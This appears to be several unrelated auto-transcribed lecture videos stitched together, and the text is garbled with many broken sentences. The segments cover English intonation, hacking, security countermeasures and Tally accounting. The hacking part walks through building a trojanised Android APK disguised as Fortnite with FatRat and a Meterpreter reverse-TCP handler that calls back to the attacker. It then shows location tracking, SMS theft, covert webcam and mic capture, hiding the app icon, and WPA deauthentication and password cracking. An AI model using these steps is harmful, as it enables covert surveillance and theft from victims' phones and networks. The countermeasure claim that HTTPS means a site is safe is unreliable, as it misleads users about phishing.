some people or it comes as a question, am I right? Is this S. Radhakrishnan? So when you are ending or when you are intonation in terms of oral communication is very important. Now there is no intonation when it comes to written communication because you're not speaking, you're just reading, right? So there another example which I want to give you which is pretty important. When you are giving an information in terms of numbers for 74156, this is my phone number. Now this is an example, it's actually not my phone number, don't call this number. Okay. Now some people just give this information as 98854744156. Now you need to allow the other person to make a note of it. Now in 74156. So my number is 98854744156. Now this is also difficult to make a note of. You won't remember. So the best way to do is to break it into 3 and 3. How do I do that? My number is 988. This is a better way to give the number because it's easier to understand and keep a track of. So instead of breaking 5 plus 5, I've broken into 3 plus 3 plus 4. My number is 98854. Giving a bank account number. Okay, I'm just typing random numbers. When you have such a long string of information, the better way to give that number is in terms of pairs, in terms of 45231463 Now don't again break it into 6, 3 and 2. You can important element in terms of intonation. When you're giving the information, you break it down so that your listeners can understand it clearly. Now one point to be noted here. When I'm giving this series, now let me reduce this, let's keep it this way. When I'm giving this series, the first method or the first intonation I'm using is, let me reduce this so that I can have a smaller example. And the number, so I'm giving this information, the series, the number is 6245231463 Now pay attention. How did I say 632? 31463 For every 2 digit, the second digit, my tone 2314632. The moment I drop intonation. Now imagine if I am not dropping this tone, it will sound like as if it's going to continue. 6245231463 Now 2, the moment I say 2 on a rising tone, it means I'm expecting or my audience is expecting one more number. But the way I say 14632, the moment I say 2, it's dropping, that means it's end of the series. 2314632. Now the 2 is so low, they always ask, I'm sorry, what is the last number again? That's why it's important the last unit of your string should be louder, but a drop tone. So it will be 6245231463 My volume went up, but my tone, my intonation is flat. Now these are the finer aspects of a very good oral communication. No matter if you're speaking to the person face to face or over the phone, they can understand you very clearly. And in order to be heard or in order to be comprehended very clearly, your pronunciation has to be absolutely perfect. So as a part of the first pillar of communication, I'm going to speak in detail about the pronunciation aspects for English language. Okay? Thank you for tuning in today. Please post your questions, whatever doubts you have in terms of pronunciation. If you're watching this on YouTube, please post your questions on the comment section. If you're watching it on Mana TV, please go back to Mana TV, the channel
on YouTube, Amravati channel, with the same session tomorrow where I'll focus on pronunciation. Thanks for tuning in. Have a good day. Bye-bye. Hello everyone, welcome back to our discussion about how hackers are using rats to compromise our systems and take over full control of our devices. So in our last session, we have discussed about how hackers are able to take control of our Windows based computers using remote access trojans or rats. So for this, we have gone with the Kali Linux operating system and we have used the package called the FatRat. Now FatRat is designed to help hacker create a client part using which hacker will take over the control of a user's computer. Now we are going to use the same application, the FatRat, to create a client application which will be targeted towards our mobile phones. So here today, if we see with most of the user activities, most of them are dependent on their mobile phones rather than their computers for doing any of the online transactions or maybe communicating with someone, exchanging their emails or messages and all this. And at the same time, hackers have also become smart. The largest market share is with Android operating system. So here I am going to show you how a hacker can compromise a mobile phone by tricking us. Now let us go with the practical part. So let us start with the FatRat package. So as usual, to start with the application, we give a command as FatRat. Okay, this seems to be okay. Seems like I am not connected to the proper network. Okay, so now let us check with our network connectivity. Show you how do we configure IP addresses. Let me obtain IP address through my DHCP. If config ATH0. Okay, looks like we have IP address. Now let us start with this. So the command we have to give is FatRat. So this would start with, so same as earlier, FatRat would check for all the required dependencies to see if everything is. Now creating a backdoor using MSFVnom. So MSFVnom is a package which is available in Kali Linux within Metasploit framework as MSFVnom. Now within MSFVnom, as we can see here on the screen, we can create backdoor applications for different kind of ASP, JSP and all. But here I'll be choosing option number 3, which is creating an backdoor application or creating as 192.168.1.103. So here my listening host address or the hacker's IP address is 192.168.1.103 and the listening port, so this can be any port here, so I can take this port as 4567. I'm just taking the port number as 4567. Now it is asking us what should be the name of the file. So whatever the client application that we are going to create, what should be the name. So I'm just giving the name as Fortnite so that for the end user
I'll be telling that this is a Fortnite game and they can download and install it. So once the name has been given, now it is asking us what should be the payload or what should be the kind of attack methods. So here I'll choose the attack method. Application would generate the payload and also the application. So here we can see we have a APK called Fortnite. So now this is the client application of our RAT, or this is a client application of the package what we will be distributing it to the end user. So let us place this APK into our web server. So here, as we know, Kali Linux have a web server inbuilt. So I'm just trying to place this application here. He will be able to get the application here. So far what we have done is we have created the fake application or the client part of the RAT using FATRAT, and then we are also placing this on the default root directory of our Apache server. So the next step is to create the server part. So for creating the server part, let us go with MSF console. So to initiate this, the command to be framework console and give us access to this. So here, as we can see, we have a prompt for Metasploit console. So now let us, so the first command is use exploit multi-handler. So here multi-handler is a service which is responsible for accepting all incoming connections from the user. So here we are going to use the exploit as multi-handler, and then let us set the payload. So the payload is Android Meterpreter reverse TCP. So the payload here is Android Meterpreter reverse TCP. So earlier we have used this payload as Windows Meterpreter reverse TCP when we are targeting Windows operating system. So here, as we are targeting Android package, our payload will be Android Meterpreter reverse TCP. Then let us set the L host. So the L host is 192.168.1.103, which is our Kali Linux IP address, and the L port is 4567. So this is the same port number what we have used for creating the client part. And then we say explore. So here, let me just download and run this package on one of the Android device here. So once the victim downloads and installs this application, here what happens in reality is that's not the actual game there, but instead you are actually giving him with the client part of the end user. So here, let us get connected to the victim's device. So once the session has been created, here we can see that the session number is 1. So I'm getting connected with the first session. So here in the Meterpreter, let me see what sort of a device is this which is connecting to the hacker's computer. So the command to do that is sysinfo. So here, as we can see, it's running on Android version 8.1.0. That's almost the latest version except for very few devices, and it says kernel version is 3.10.108. So it shows us what is the version of Android that is installed on the device. So we know what operating system is installed on the victim's computer or on the victim's mobile or tablet device. Now we can give a command geolocate. So this coordinates, this is how it is showing us. So all we have to do is copy the location coordinates and go back to Google search. So when we try to access Google Maps with this particular location coordinates, so that's how it shows us the location of the person. So based on how effective is the GPS, you'll be able to pinpoint the person or the user maybe like around a 1 or 2 meters range. So you'll know the exact location of the person. Or not only with the location of the person,
you will also be able to get all the information from his mobile phone. Like say, I can give a command dump, or in the same fashion we can also give options like dump call logs or SMS messages and all. So it says like it has saved it into your system with this particular file name. In the same way, just like contacts, we can also, so this will directly download all the SMS messages from the user's mobile into your system, right? And not only this, you will also be able to say send SMS. So when you say like send SMS, you will also be able to create and send a message to someone from victim's mobile. And not only this, you will also have full access to the victim's mobile file system. So we can say cd/sd card/. So once we give this command and we say ls, you will be able to open, or you will be able to view all the contents of the file. To use the same command downloads to download any of the content. So you can say download and give the particular file name. You will be able to download it from victim's mobile device or their tablet to your system. But be very careful when you are trying to download this. So let me say I'll try to download this particular file. Be very specific about what things you are trying to download, because if you are trying to download a very large file, like say a 1 GB or 2 GB content, maybe end user doesn't have, is just trying to download that particular file and save it onto our computer. So it is saving it. Open G apps. So this is how we have the package available. So this is a file which has been downloaded. Webcam snap. So this will actually try to click a picture of the, so once we give a command like webcam snap, just tries to click a picture and then tries to show us. So here maybe the image quality is not so good, but still let me just try to zoom in. Okay, so this is how it just tries to show me. But let us say like we are not satisfied with just a picture. We will also be able to do a live stream. So once we say like do a web camera stream, it just tries to open your web browser and then tries to put up a live stream of what all things the victim's mobile device is able to view. Still taking some time. Okay, there seems to be a session disconnection here. So let us just try to run this application again. Exploit -j. So it's just trying to run this. Now let us wait for the victim to connect back. So here, as you can see, it's like I'm just trying to point it towards my system and all. So we can see like there's a live stream of what all things the victim's camera is able to see. So what all things the victim camera is able to view, we'll also have a live stream of all that. Just think like his mobile phone is idle, not doing anything, but in reality his mobile phone is actually sending in all the recording stream and application somewhere outside the official Play Store or the App Store. Now the only problem is when we see with most of the users, if they have to purchase some games or apps, they are not really ready to do that. So instead of purchasing it from the official Play Store, they go to a third-party store where they can download the applications, download them and then install it. So security would be compromised because of this, and if you try to download and install an application, there is no guarantee that the application what we are getting is genuine. It may be modified by the hacker. So once it has been modified by the hacker, all the activities of end user will be visible to the hacker. And not only running with your live camera and all, hacker can also say record mic and give a duration. So for the next 120 seconds, what all things will be sent to the hacker. And the worst thing, hacker can also say
hide app icon. So as an end user, you'll just think like maybe that application was not installed properly, or that was uninstalled, or something happened, because you don't even see that application icon there. Now this will also make it very difficult to see what actually is happening on your device. So you'll have to be very careful about what sort of tools or games that you are trying to download and install on your mobile devices. So the best way is always try to be sure whether it is clean or it has been injected with something else. It may be a malware. So not only hacking into users' computers, but hackers are also capable of hacking into your mobile phones. So Kali Linux can be used to systems and all. Now not only with these particular activities, Kali Linux can also be used to help a hacker hack into someone's wireless networks or Wi-Fi networks. So today if we see with most of us, be it in a home network or be it in the corporate environment, we are all dependent on wireless networks. So generally when we speak of any wireless network, we'll be having a Wi-Fi access point connecting us to the internet, and now we will connect all our mobile devices or laptops and all to this Wi-Fi. So let me show you what actually happens here. So we'll be having a Wi-Fi access point, and now this particular Wi-Fi access point can give us signals in certain range. Let us say it can give us signals in a range of 20 meters. So this is how the access point is available, and this access point has a range of 20 meters. So any person or any mobile device which is capable of connecting with a wireless network, assume there is a system here A which has a Wi-Fi card connected. So it can identify that there is a wireless network available somewhere nearby and will be able to connect. In the same way, I am also taking up another user B. So these two systems will be able to access internet by connecting into to access our local network or the local resources. Now assuming A and B are both employees of this particular organization, or they belong to this particular wireless network. So there is no problem when these two people connect to the Wi-Fi and access something. But assume there is a hacker who is within this particular range. So now as we say, our Wi-Fi access point can give signals for a 20-meter range. Hacker who is also present in the same range will be able to view that there is a Wi-Fi access point available. So what he can do is he can see the SSID of our Wi-Fi network. Now SSID is nothing but the Wi-Fi name. So whatever the name that we are to this particular network, as we all have seen in most cases, your Wi-Fi access point would ask us for a password. It would request us to type in a password, and based on the password we will be able to authenticate and join the network. But here use a technique called sniffing, which we have discussed earlier. So hacker will have to use sniffing, that is trying to capture the traffic between a client system. Hacker will have to capture the traffic between the client computer and access point, and then he will be able to get the actual password. Now here when we speak of the passwords, add equivalent privacy, WPA Wi-Fi protected access, or WPA2 Wi-Fi protected access version 2. So these are the three different types of encryption standards that are available which will protect our data. So here when we speak of WEP, this uses an algorithm called RC4 with 40-bit encryption used in WEP. WPA2 uses an algorithm AES, which is different from the other two standards, IV, which would initiate your session, and then a 128-bit master key, which is used for securing the data. Right. So here when we see, out of all the three different types of encryption standards, WEP, which is only using a 40-bit encryption, has the weakest encryption standard. WPA and WPA2 are using two different connecting to the access point. 10 systems will have 10 different 128-bit keys given by the access point.
So things are actually more complicated. Not even support WEP networks. You will only have support for either WPA or WPA2. So now let us see how hacker would have some specific requirements. That is, hacker would require a compatible Wi-Fi card, Linux operating system. So Kali Linux is already available. Now we just have to make sure that our Wi-Fi card is compatible, right? So I'll be showing you which specific card is compatible for this sort of activities. Now let us see what actually hacker does to capture the traffic between one of the associated device, one of the client and the access point. To do this, what we have done in the wired or Ethernet networks. So placing his Wi-Fi card into monitor mode, hacker will be able to capture the traffic. But problem with WPA or WPA2 networks, here not only user's mobile device has to authenticate only once. Means when device is first access point coming back into the network range, then it will have to connect. So authentication would not be repeated multiple times. So assuming I have an access point and there's a laptop or maybe there is a mobile phone which is already connected, we don't have to re-authenticate multiple times. So only for the first time when we are joining the network we have to authenticate, and if that is successful we can continue for any number of hours or any number of packets can be exchanged. But if we are trying to reason access point itself was restarted, we will have to re-authenticate. Now here hacker is going to use the exact same thing to launch something called a de-authentication attack. Hacker is going to launch something called a de-authentication attack, where hacker would force all the connected devices, like all the connected that is because, as we said, client systems are only connecting to the access point once. So as a hacker, if all the devices are connected to the access point, there is no way for us to do something. That means there is no way for us to capture the password. Either we have to wait. Authentication is always the best option here. So let us see what actually hackers are trying to do and how they will try to crack the password. So for this I am going to use an inbuilt suite in Kali Linux called Airmon suite. So let me just quit the FatRat package. Now we don't require this anymore. So let me directly run this Airmon suite and see if we can capture the passwords or not. So for this I have to connect an external Wi-Fi card to my system. Wi-Fi card is connected. I just have to run a command airmon-ng. So it has to identify my wireless card and show us the result. So here, as we can see, if it is showing us with the result, what is the name of our wireless card, what is the chipset, and what is the driver being used and all, so then it means that our Wi-Fi card is compatible for this activity. So once we make sure that our Wi-Fi card is compatible, next let us try to place this Wi-Fi card in Prometheus mode. So for this we say airmon-ng start WLAN 0. So here W card is placed in monitor mode, and the monitor mode interface has given a name as WLAN 0 mon. Application also says that there are 3 services running in my system which might interfere with my activities. So I would say stop the services. To do that I give a command kill and the process ID, whatever the number is shown here for that specific process, we will have to kill that. I should be seeing another interface aerodump-ng WLAN 0 mon. So we just have to let this application run for some time so that we will be able to see all the Wi-Fi networks and also like if there is some traffic passing on through or not. So here as we can see there are so many networks available. So let me just try to stop this.
So here I am trying to crack a network called Wi-Fi, which is using compromise this particular network. All we need is the MAC address of the access point. So here sometimes most of us think like if we enable the option like hiding the MAC address or hiding the name point. So here let us start capturing all the traffic. So here when we speak of the channel, we'll so this particular access point is running on channel. All the files or all the traffic, whatever we are trying to capture between the mobile phone of the user and the access point into a file called, here it just tries to capture all the traffic on channel number 7. But as we can see, we don't see any kind of WPA handshake, de-authentication attack. So for this we say airreplay-ng-0, send this message 2 times. So this will be broadcasted twice as if it is coming in from this access point. So I'm saying use WLAN 0 MON interface. Now see, I'm trying to broadcast this message twice, and here we have a WPA handshake available. Now here if you see, there's no prompt on my system or somewhere. That if we actually look into the files which are saved here on my desktop, we can see that there are multiple files like test-01.cap, test-02.cap and all. So these are the files which have been captured by we are able to get the actual password. To do that, I'm going to run a command. I'm going to use a password dictionary file called passwords to crack the password of this particular access point with the MAC address. And then I have to say try to crack the file called test-02.cap. So here as we can see, it tries to crack the, even your wireless networks are not really safe if someone can capture the traffic between your user's computer or the user's mobile device and the access point. So how do we stop these kind of attacks and all? How do we protect our wireless networks or our mobile devices and all? We will discuss in the next session. So then we will discuss about the countermeasures in the next session. Thank you all. Last few sessions we were discussing with different kind of attack methods how hackers are trying to compromise our systems or our servers. We speak of countermeasures. Countermeasures are those techniques or procedures which are to be followed to secure our networks or our data from different sort of intrusions. So in short, countermeasure is just a precaution or maybe a procedure we're discussing so far. So first we have taken an assumption that hacker is somewhere on internet and he is going on with collecting the details about our network and then trying to launch an attack. So the first technique that we have discussed is hacker is collecting all the information about a targeted host or a targeted network from publicly accessible resources. Like say hacker wants to find out all the details about our server or about our networks. He is going on with different websites like Netcraft, technicalinfo.net, or maybe hacker can use some tools like SmartWhois or SamSpade to find out details about our servers. So here when we speak of details, hacker is trying to find out what kind of operating systems are being used. So here as we say, hacker is collecting all the details from publicly accessible resources. That is, in short, he is getting information from internet. So here, being an administrator of any organization, though our responsibility is to protect our servers, hacker is trying to collect all the information from internet which is already available on a public domain. So here when hacker is performing footprinting,
we will not even be aware of his activities. So footprinting, we will not be going on with scanning. So here when we speak of scanning, hacker is trying to scan our networks or our servers to find out more information are actually present in the given range of IP addresses, understanding what all open ports are present on a system, and then how many vulnerabilities are present. So here let us see one by one. So here when we speak of identifying, these IP scanners are using ping request. So here all the IP address scanners are trying to use or identifying the live host. We can deny all ICMP traffic, so that if a hacker is trying to identify how many systems are present in our network, we will be able to prevent his activities. And then when we speak of open ports, so that is the next step that every hacker does. So in open port scanning, hacker is trying to find out what all open ports or what all services are running on a machine. So to prevent this, we say we'll have to disable all the unused services. So maybe your server operating system may have so many different kind of services running in. So here the countermeasure is, if we do not require all those services, we will have to disable this. Not only on a server, port scanning. So when we use a firewall and we receive request from hacker's computer asking us, speaking of vulnerability scanning, so this is the last step of scanning activities, wherein a hacker tries to identify what actually is the weak on the operating system or on the application whatever is installed, or maybe because of the configuration. So here we can also use an intrusion prevention system which can identify and block this vulnerability scanning attempts. A system's operating system, so it can be your laptop or your desktop, or it can be your server. So the process what also. So here when we speak of operating system, hard operating systems, so it is always recommended that we use genuine operating systems and applications, so that even if a hacker is trying to find out some vulnerability, timely updates from the manufacturer. So your software developers are giving you with all the updates. So any issues which are found have been fixed. Now not only with the genuine operating systems, we also have to make sure that all the security patches which are released, it can be a security update or it can be in the form of a service pack, we'll have to download and install this. Now here again when we go with downloading and installing a security patch, there are certain precautions that we have to take. So here when we speak of the precautions, so maybe there is a chance when you download and install a security patch, it might create a conflict or a stability issue with one of your existing application. So the best way is download this security patch and install it on one of the test machines. Check if this security patch is fixing up all the issues or not, and then also try to see if it has environment group policies where we can define what actually is a privilege. So here there is a concept called AAA, which is generally used in terms of network devices, which stands and accounting. So this is a very common practice that is in place with every network. So here when you speak of a router, it can be a firewall or it can be any data. So here we have to first authenticate the person. Authentication, as we all know, like say we are trying to access our Gmail, web banking user ID and password. So here authentication is a process where a user proves to the system that he is a actual person, he is a correct person. Or authentication can be in a form of your biometric like a fingerprint or a voice recognition. The second step, that is authorization. Okay, user is authenticated, but what can he do? Now the best example here when we speak of our operating systems, we create different types of user accounts like administrator account and a normal user account. So when we speak of the main differences here, administrator has system. So this guy who has administrator privilege
will be able to manage everything on the system. It can be on a desktop or it can be on a server. But here when we speak of a normal user account, this user will not have any privilege to add or remove certain. So authorization is where you give a permission. If a user is logging in, what can he access? Is he permitted to access Firefox? Is he permitted to access my C drive? Is he permitted to access my D drive? Okay, he is permitted to access my D drive. Sort of permissions we are giving in, that comes under authorization. And then finally it comes to accounting. Accounting is where you see which user is actually logging in, from which computer, how long he was logged into the system, so when did he log in, when did he log off, and what all activities he has been doing in. So this is the concept of AAA or in. So we are giving some user level controls, what actually a user is permitted to do. So that will also help us properly secure our systems. So we will have to give certain group policies to control what actually or what sort of data can be accessed by a user. And then we should also be creating a baseline security template saying like, let us end user can bring their own systems and connect it to the office network. Now assume I have 100 people working with my office are safe. We cannot say that. So what we do, we create a baseline. We say that all the systems, genuine operating system and a genuine antivirus application, worry about any sort of vulnerabilities or any kind of malwares. And then I should also say that user should have installed the latest, say user will have to install Service Pack 2. Without Service Pack 2 I will not let the user access his computer in the network. Or no, user is going on with Windows 8. I would say user should have Windows 8.1 update installed. Without this I will not permit him. Or if user is trying to use say Windows 10, we say at least Windows 10 version 1803 should be used. He should have the latest security updates related to 2018.10. That is all the security updates of the month October. What we call as creating a baseline security template, and all the systems should have minimum requirement fulfilling this baseline security or higher. So this is how we can go with the countermeasure for operating system related or application related vulnerabilities. And of course along with this we also require IPS, which I will be explaining now. Now here, assuming a hacker is, so hacker would try to launch an attack. So technically we call this as an exploit. So hacker is trying to launch an attack on the system by understanding what actually is the vulnerability there. So here, as explained earlier, we will have to first try to fix what all vulnerabilities are present. So for this we go with patch management. So in this we have different steps, that is trying to understand what is the vulnerability, understand the vulnerability. So we'll have to first understand what actually is this problem there, and then download the security patch. Then the third step, test it on a test machine, also stable, and then finally deploy the security patch. So this is how we go with. So we'll have to first understand what actually is the vulnerability, then download the security related patch, then try to test it on a test machine, and then finally deploy it. So let me show you how it on a computer. As we have been discussing earlier with our scanning session, administrator can perform a vulnerability scan. Administrator can perform a vulnerability scan on all the systems in the network by using applications like Shadow Security Scanner or Nessus or Accutenix, and then he will also have to check with the available security patches or see what all missing security patches are present. So here, to view all the missing security patches, we have to run an application called missing security patches information of our computer. Now
missing security patches doesn't mean only for our Microsoft products. It will also show us missing security patches for any other products also. So here, when we look into this, it says the security benchmark scoring on this particular computer is 0.63 on a scale of 10. So it says that this system is really not secure, are missing in here. So this is the status of this particular computer. So when we scroll down here, this is a language which is used and also the time zone and when exactly it was installed. Also tells us it tells us what kind of processor is used on this computer, and then what is the motherboard. Information about the user accounts which are present and also the privilege level. So updates all the security fixes. So here it shows us with all the security updates which are missing in. And here, as we can see, it also tells us how important it is, whether it is a critical issue or is it really important or it is low risk. So it is also showing us what actually is the severity level, whether it is high risk or low risk or whether it is really very important or not. So like this, it just gives us with list of all the missing security updates on this computer. So once we have this information, we will be able to directly go into that particular link and try to. So might be Microsoft is not directly giving us access to it, but no issue. Let me just look in for something else. Okay. So it says like the product what is installed on my computer, the Shockwave Player version 12.2 has been installed somewhere in 2017 and I would require an update. So the solution is I have to install 12.31.201. Okay, so the current version installed is 12.2, which is old, and as per Adobe they says I have to install 12.3.1.201, and they are also directly giving us with the link where we can download it. So this is how Belarc will help us understanding what all security patches are missing on our computer. So accordingly, we will be able to take up the necessary actions to protect our systems. So then, speaking of the other technique, assuming where a hacker is in our network. So far we have been assuming that hacker is somewhere on internet and he is trying to crack our passwords. But now let us assume hacker is not somewhere on internet, but he is within our network. So here, for a hacker to take over control of our systems, if he is present within the network, all he needs to do is steal our passwords or crack the passwords. So here we have been going through with different techniques what hackers can use, and the first technique is something like sniffing. So what actually happens in sniffing is, so assuming I have a server and we also have a client computer, or let us say this is the admin's computer and this is a hacker. Now when administrator is logging in, so he is using man-in-the-middle attack to capture the traffic and view what is the user ID and what is the password. Now this is one of the mills from this. What we need to do is we have to go with something called end-to-end encryption. So here the solution is we'll have to go with end-to-end encryptions. Now this actually depends on a process called cryptography. So cryptography is a process where we try to encrypt and decrypt the data in order to secure it. So here generally when we speak of encryption, there is a process where we convert. So this unknown format is called as ciphertext. So we are just trying to convert clear text data into an unknown format or ciphertext. So let us see how actually end-to-end. Now maybe these two systems are part of the same network or they are connected through internet. Now assuming that system A has to send some information to system B.
let us say source is A and destination is B, and they have to send some data. Now here we are always concerned about protecting our data, so we will try to encrypt the data part here of this particular packet. Now let us say system A has a password which is like abc@123. So this is a password which is used by system A to encrypt this particular data. Now once a packet has been sent to system B, now B receives this packet but is not able to directly view the decrypt it. So decryption means B will have to reverse this encryption to get back access to the original data. Have the same password as A so that it will be able to decrypt the data. So for this to be successful, system A will have to. So here we are going to use a same password for both encryption and decryption. This we call this as symmetric key exchange method for encrypting and decrypting the data. But unfortunately, assuming there is a hacker who is sniffing the traffic, hacker will also be symmetric key encryptions, because the chances of your password or the key being exposed to the hacker is one password for encryptions and decryptions. So in asymmetric key exchange, we are not going to use the same password for encrypting and decrypting. So what actually happens here? You either depend on a third party key mechanism like internet key exchange, IKE. You have to provide your password. Let us say I am giving my password as abc@123, and now what IKE does, it takes up this clear text password. To this it will add some random data, an algorithm called Diffie-Hellman algorithm. Now the output of this Diffie-Hellman algorithm is you get two different passwords, public key. Now as the name says, this private key will be present only on the system and public key will be exchanged with the other computer. So if I am exchanging data between two different computers, I will be giving away my. So here this is how the scenario looks like between system A and system B. Both are connected via internet. So here, as we said, we will be running IKE. You have public key A and private key A. In the same fashion, we also have public key B and private key B. Now both the public keys will be exchanged. So public key A will be shared with system B, and public key for it as a user if two users are exchanging this. Now when we speak of the hacker is able to capture our public keys. He is able to capture public key A as well as public key B, but he doesn't have access to the private keys. Now here when we speak of the data being encrypted, assuming data is sent from system A to system B, all the data will be encrypted using public key of B. So we are trying to encrypt it with possible only for system B to decrypt the data using its private key. Now the best example of this sort of the conversation with this so-and-so contact is encrypted with end-to-end encryption. So that actually makes it impossible for any other party to data content. So if you are using any application which supports end-to-end encryption, this actually makes it impossible for a hacker to sniff and view your traffic. So that gives us with very good security against sniffing attacks. And then when we speak of the other kind of attacks, hacker can capture our hash values and then try to brute force it or use a dictionary based attack. So basically in brute force, hacker is trying to test all possible combinations of alphabets, numbers and special characters. Or in case of dictionary based attack, hacker is trying to create a password dictionary by guessing what can be the correct password and then use it for cracking the hash value. So here the best way to protect ourselves is try to use a password which contains alphabets, both lowercase and uppercase.
So let us use lowercase and uppercase characters, numbers, and also special characters. So not just going on with only lowercase or only uppercase, we have to use a combination of everything. And generally it is recommended that your password should be at least 12 characters or more. And whenever you have an option, if the service supports it or it is available, try to use OTP. You type a password, then again you'll have to receive an SMS or a call from the service provider, get one more password and all. But this is actually trying to secure our systems. So even if hacker is able to steal our user ID or password using phishing or keylogging, unless, or if you are an administrator yourself, try to limit the number of password attempts that a user can go with. So if you are maintaining a server, it's better you say like after 3 or 5 failed attempts, after 3 failed attempts or maybe 5, maybe you can block it for a duration of 1 hour or maybe like 12 hours, same like what our banking systems do, right? So this will actually discourage the end user because he cannot go with brute force attack because no one have patience to wait for next 12 hours just to try another 3 password combinations. So these kind of precautions can be taken to protect ourselves from brute force attack. And then coming into the next attack method, that is phishing attack, is always look into the address bar of your URL, right? And if it is a HTTPS website, you are safe. If it is not a HTTPS website, then it's very clear that this is a fake web page, it's a phishing page, and do not type any user ID and password. So any web page which is asking you to type your username or your password or maybe give any other kind of confidential data like your net banking or your credit card details or anything, they all should be HTTP. Some error messages like your web browser tells you that this particular HTTPS web page cannot be trusted. Be very careful if you see that kind of warning message. Maybe sir says HTTPS but it's crossed out. So you'll have to be very careful in that case. So your web browser tells you that there is a problem with HTTPS connection in 2 conditions. 1, it is not receiving a valid certificate from the server. So if it is not receiving a valid certificate from the server, there should be someone sniffing your traffic. That's the reason. Or the second case, check with the date and time of your computer. Maybe your date and time is not properly set. If your computer's date and time is not properly set, you'll still see that the HTTPS sessions are not accepted. That is because every HTTPS certificate will have a specific validity time. So if your computer's date and time is not matching with the certificate's validity time, it says that your HTTPS is not trusted. Or maybe someone is trying to sniff your HTTPS the other confidential data. Then speaking of keyloggers, so here when we speak of a user and report it back to the hacker, and the worst thing, keylogger is not visible to the end user. So in such case, we have to use an application like are there on the computer. Belark can also identify what all softwares are installed on our computer and show us with a list of it. Now based on Belark, we can see if we have any kind of unknown or suspicious applications installed on our system. So let us see that. So here I am going on into the Belark report. So here we are able to view all the missing security updates. So in the same page, you can just scroll down, and here finally it shows you what all softwares are installed on the computer. So it gives you with a list of all the softwares that are present. Though Belark doesn't, now you have to go through with each and every software and see what actually it is. And if you want to see the location where exactly it is installed, you'll be able to click on this symbol I right next to every software. It directly takes you to the location where it is installed. Now based on the location, based on the file names, you can see whether it is a genuine software or something malicious. Or you can take up these file names and also perform a Google search and see what other people have to say about these softwares. So here when we look into Belark results, so here we can see that there are some applications, something like local synchronization host. So generally the name doesn't look suspicious.
maybe it is about some synchronization between my computer or some other dangerous or malicious. So directly click on the link. So here, as we can see Windows System 32 MPK. So here we come across some folder and there are some files and all, but we are not really sure what actually it is. So let us perform a Google search. Okay, so here we can say mpk.exe, and here as we can see Google is giving you with different sort of results. So we'll have to patiently keep checking with each and every result here, and here you can see Windows System 32 mpk.exe. It says that this is something or not. So finding a keylogger is easy if you have. And then speaking of how do we protect ourselves from malware. Now malware can be different types. It can be virus, it can be worms, it can be a trojan, can be a rootkit, can be a ransomware and all. So in such conditions it's a module. So let me show you how actually a total security suite application looks like. So here I have installed something called Bitdefender Total Security Suite. So when we look into the protections, so it has antivirus protection, it also has a vulnerability scanner, has a personal firewall, anti-spam protection, online security features to protect our computer from antivirus or worms or trojans and all. At the same time, it also has a firewall, it has anti-spam, it has a vulnerability manager, it identifies what vulnerabilities are present on our computer and give us a report, and it also has protection from ransomware. So these sort of features we'll be getting in a total security suite application. Okay, so we'll be getting total security suite with these sort of different features and all. Now not only this, even here when we look into our web browsing activities, see this for us to access or not. So this is how it also gives us with web-based protection. Or maybe I'm trying to download a software from internet. So I visit this particular web page icar.org and I'm trying to download a software from this properly or not. So I can directly go into download and say try to download the virus file. Now here as we can see, it tells that the file what you are trying to download. So a total security suite will include all the required features or the required modules. It also has a ransomware protection and a personal firewall also. So this is how, if we are using a total security suite, we will be able to protect our computers and also our data from damage with any sort of different kind of malwares. So if you are a home user, just or fixes, and then trying to have a very secure password, and if possible trying to use an OTP, and also installing a proper total security suite application with all the latest updates, so that your computer will be safe from different sort of attacks. And also a little bit of patience when you are accessing something on internet, because whenever you try to come across some application or an offer or a deal, just think for a second or two, is it really attacks or any sort of malwares that you try to download, or any kind of keylogger or any kind of other tricks that hackers can play. Now even if you are an administrator, to protect your host computers or your servers, you go with the same precautions to be taken care of, like installing a firewall or intrusion prevention system. So that we will be discussing in our next session with the host systems. Thank you all. Hello, good morning sessions. I hope we have done 8 sessions. In these 8 sessions we have done with how to create a company, how to create the ledger accounts, 6 voucher types, that is sales, purchase, receipts, payments, journals and contra. At these 6 voucher types we have done, and we have solved one solutions on that, one problem on that, right. Today we are going to see some other from other vouchers also, like how to
make the general vouchers, okay, how to make the sales invoice with inventory. In the last session we have seen only accounting part, right? So we have seen receipts, payments, inventory, and I had shown you how to do the closing stock without inventory, right? So మన లాస్ట్ 8 క్లాసెస్ నుండి చూసుకున్నట్టయితే మన కంపెనీ క్రియేషన్, లెడ్జర్ క్రియేషన్, స్టాక్ ఐటమ్ క్రియేషన్, వోచర్ ఎంట్రీస్ ఇవన్నీ చూసాము. రిపోర్ట్స్ ఇంకా చూడలేదు. సో రిపోర్ట్స్ వీ హ్యావ్ సపరేట్ క్లాస్ ఫర్ దట్. నిన్న సెషన్లో వోచర్ ఎంట్రీస్ చూసాము, ఒక ప్రాబ్లం కూడా సాల్వ్ చేసాము. దట్ ఈస్ వితౌట్ ఇన్వెంటరీ, అంటే స్టాక్ లేనప్పుడు ఎలా చేయాలని చూసాం. ఇవాళ ఒక ప్రాబ్లం సాల్వ్ చేద్దాము మనము విత్ ఇన్వెంటరీ. సో వీఆర్ గోయింగ్ టు సాల్వ్ వన్ ప్రాబ్లం how to create with inventory. So how to make the purchase voucher sales with inventory, right? So please see the screen now. So I am opening Tally. So this is your problem, okay. Create the company in Tally with the following details, okay. So name of the company is Ganapati Furniture, address is given, okay. Okay, some transactions are given, okay. Purchase are also given, right? Purchases ఉన్నాయి, అలాగే సేల్స్ ఉన్నాయి, అలాగే now we are going to see how to do this problem, okay. Step is creation of company. So I am going to create a company, alt F3, create company. So the company name, what is the company name? Ganapati Furniture. Okay, address something here, something is given like what is shop number 12, shop number 12, ground Ramnagar, Hyderabad. Country is India, state is Telangana, pin code is 5,20,000, phone number just again some number, okay, and I am saying the company. So company is save చేస్తాం. Now the first step is creation of company, we have done with that. Now second step is creation of ledgers. We are going to create all these ledgers, right? So accounting info, ledgers, and I am selecting multiple ledger, okay. So all items and create చేసి ఇక్కడ ప్రతి ఒక్క లెడ్జర్ క్రియేట్ చేద్దాం. I am creating Vinay capital under capital. Next Vijay capital under capital account, okay. Next one deposit in Canara Bank under bank accounts. Next paid cash to Mr. Narasimha towards rent deposit. So rent deposit, ఇక్కడ మనము రెంట్ డిపాజిట్ గురించి పే చేస్తున్నాం కాబట్టి మనము రెంట్ డిపాజిట్ చేసుకోవాలి. సో ఆల్వేస్ రిమెంబర్ దట్ వెన్ ఎవర్ యు ఆర్ పేయింగ్ ఎనీథింగ్ అమౌంట్ టు ఎనీ 